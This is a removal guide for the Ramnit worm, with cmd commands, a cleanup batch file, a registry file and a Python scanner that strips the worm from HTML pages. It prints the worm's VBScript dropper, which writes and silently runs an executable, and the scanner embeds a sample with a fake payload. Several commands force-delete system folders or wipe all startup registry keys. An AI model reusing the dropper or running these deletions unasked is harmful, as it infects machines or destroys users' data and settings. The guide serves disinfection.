1. Run Microsoft's Process Explorer. Suspend every svchost.exe that sits under explorer.exe (the genuine service hosts are the ones under services.exe; leave those alone). Suspend them all first so they cannot respawn one another, then terminate the process tree.
2. Disable System Restore for the duration of the cleanup, so the infected restore points are discarded; re-enable it once the machine is clean.
3. Delete the recycler, recycled and "System Volume Information" folders, as follows:
(in this example the admin account is named pubercity, the system root is C:, and the data drive is D:)
- run cmd.exe and type:
c:\>rd /s /q "c:\recycler" [enter]
c:\>cacls "c:\system volume information" /t /e /c /g pubercity:F [enter]
c:\>rd /s /q "c:\system volume information" [enter]
d:\>rd /s /q "recycled" [enter]
4. Create Ramnit_removal.bat and Ramnit_removal.reg and put them in the same path/folder. To create them:
Run Notepad, paste the script below and save it as Ramnit_removal.bat
@echo off
REM Remove/delete the main virus files
del /f /s /q /a "%ProgramFiles%\Microsoft\WaterMark.exe">Delete_Log.txt
del /f /s /q /a "%ProgramFiles%\Microsoft\DesktopLayer.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\System32\dmlconf.dat">>Delete_Log.txt
REM Erase the other tricky worm files, if they exist
del /f /s /q /a "%Systemroot%\dmlconf.dat">>Delete_Log.txt
del /f /s /q /a "%Systemroot%\lssas.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\ExplorerSrv.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\System32\rundll32Srv.exe">>Delete_Log.txt
del /f /s /q /a "%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exe">>Delete_Log.txt
REM the file name before .exe in the next path is blank in the original post
del /f /s /q /a "%UserProfile%\Local Settings\Application Data\\.exe">>Delete_Log.txt
REM Prevent the virus from coming back: occupy each dropper path with a
REM read-only system folder of the same name so the file cannot be recreated
mkdir "%ProgramFiles%\Microsoft\WaterMark.exe"
attrib +r +s -h -a "%ProgramFiles%\Microsoft\WaterMark.exe" /s /d
mkdir "%ProgramFiles%\Microsoft\DesktopLayer.exe"
attrib +r +s -h -a "%ProgramFiles%\Microsoft\DesktopLayer.exe" /s /d
mkdir "%systemroot%\System32\dmlconf.dat"
attrib +r +s -h -a "%systemroot%\System32\dmlconf.dat" /s /d
REM Restore the registry settings
reg import Ramnit_removal.reg
exit
Run Notepad, paste the script below and save it as Ramnit_removal.reg. Note that it deletes every entry under the Run/RunOnce keys and MSConfig's startup lists, legitimate autostart entries included, and then recreates the keys empty; anything you still need there has to be re-added afterwards. It also restores the stock Userinit value and the default .exe/.reg/.inf file associations that the worm hijacks.
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="c:\\windows\\system32\\userinit.exe"
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@="regedit.exe \"%1\""
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@="Application"
"EditFlags"=hex:38,07,00,00
"TileInfo"="prop:FileDescription;Company;FileVersion"
"InfoTip"="prop:FileDescription;Company;FileVersion;Create;Size"
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@="%1"
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@="\"%1\" %*"
5. Run Ramnit_removal.bat, then finish the registry cleanup with Smadav or CCleaner.
6. Restart into Safe Mode (press F8 during boot) and scan with an up-to-date antivirus; Kaspersky is recommended.
7. Restart and clean the .htm and .html files. The sign of infection is that, when an .htm or .html file is opened in Notepad, this script appears at the bottom:
<SCRIPT language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 ' ... very long here, truncated
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
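Step 7 can be done mechanically instead of opening each file in Notepad. The Python scanner below is an added example, not code from the original post: it matches the appended block from the `<SCRIPT language=VBScript><!--` opener to the `//-->` closer, decodes the WriteData hex exactly as the VBScript does (two hex digits per byte), confirms that the decoded bytes begin with `4D5A` ("MZ", the header of a Windows executable), hashes the dropper for analysis, and strips the block from the page. `FSO.GetSpecialFolder(2)` is the user's TEMP folder, so the dropped file lands in %TEMP% under the name svchost.exe, chosen to blend in with the legitimate service hosts. The sample page and the shortened fake payload are constructed for the demonstration, and the function names are this example's own.

```python
# Find and strip the Ramnit-style VBScript dropper appended to .htm/.html files
# and recover the hex-encoded executable it carries. Added example for this
# page, not code from the original post; names and sample are this example's.
import os
import re
import sys
import hashlib

# The injected block runs from "<SCRIPT language=VBScript><!--" to "//-->"
# (plus a closing </SCRIPT> when present). Quotes around VBScript are optional
# because the real injection leaves the attribute unquoted.
DROPPER_RE = re.compile(
    r'<SCRIPT\s+language\s*=\s*"?VBScript"?\s*>\s*<!--'
    r'.*?DropFileName\s*=\s*"(?P<name>[^"]+)"'
    r'.*?WriteData\s*=\s*"(?P<hex>[0-9A-Fa-f]*)"'
    r'.*?//-->\s*(?:</SCRIPT>)?[ \t]*(?:\r?\n)?',
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample: a clean page with the dropper appended. The hex payload
# is a fake 64-byte MZ header, not a real binary; an infected file carries the
# whole dropper as tens of kilobytes of hex.
FAKE_PE_HEX = "4D5A90000300000004000000FFFF0000B8000000" + "00" * 44
CLEAN_HTML = "<html><body><p>Hello</p></body></html>\r\n"
INFECTED_HTML = CLEAN_HTML + (
    '<SCRIPT language=VBScript><!--\r\n'
    'DropFileName = "svchost.exe"\r\n'
    'WriteData = "' + FAKE_PE_HEX + '"\r\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\r\n'
    'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\r\n'
    'If FSO.FileExists(DropPath)=False Then\r\n'
    'Set FileObj = FSO.CreateTextFile(DropPath, True)\r\n'
    'For i = 1 To Len(WriteData) Step 2\r\n'
    'FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))\r\n'
    'Next\r\n'
    'FileObj.Close\r\n'
    'End If\r\n'
    'Set WSHshell = CreateObject("WScript.Shell")\r\n'
    'WSHshell.Run DropPath, 0\r\n'
    '//--></SCRIPT>\r\n'
)

def find_dropper(html):
    """Return details of the injected dropper, or None if the page is clean.
    The payload is decoded as the VBScript does it; an odd trailing nibble is dropped."""
    m = DROPPER_RE.search(html)
    if not m:
        return None
    hexdata = m.group("hex")
    payload = bytes.fromhex(hexdata[: len(hexdata) // 2 * 2])
    return {
        "drop_name": m.group("name"),
        "payload": payload,
        "is_pe": payload[:2] == b"MZ",  # "4D5A" = MZ: a Windows executable
        "sha256": hashlib.sha256(payload).hexdigest(),
        "span": m.span(),
    }

def disinfect(html):
    """Return (cleaned_html, info); a clean page comes back unchanged with None."""
    info = find_dropper(html)
    if info is None:
        return html, None
    start, end = info["span"]
    return html[:start] + html[end:], info

def disinfect_tree(root, dry_run=True):
    """Walk root for .htm/.html files and report infections; unless dry_run, keep
    the original as <name>.ramnit.bak and write the cleaned page back."""
    infected = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1", newline="") as fh:
                cleaned, info = disinfect(fh.read())
            if info is None:
                continue
            infected.append(path)
            print(f"{path}: drops {info['drop_name']} PE={info['is_pe']} "
                  f"sha256={info['sha256']}")
            if not dry_run:
                os.replace(path, path + ".ramnit.bak")
                with open(path, "w", encoding="latin-1", newline="") as fh:
                    fh.write(cleaned)
    return infected

if __name__ == "__main__":
    # Usage: python ramnit_html_clean.py <root> [--fix]   (default is a dry run)
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    print(len(disinfect_tree(root, dry_run="--fix" not in sys.argv)), "infected")
```

Run it with a drive root as the argument for a report only, and add --fix to rewrite the files; the .ramnit.bak copy keeps the dropper so it can be hashed or submitted to an AV vendor. Files are read and written as latin-1 with newlines preserved, so bytes outside ASCII and the CRLF line endings survive the round trip unchanged.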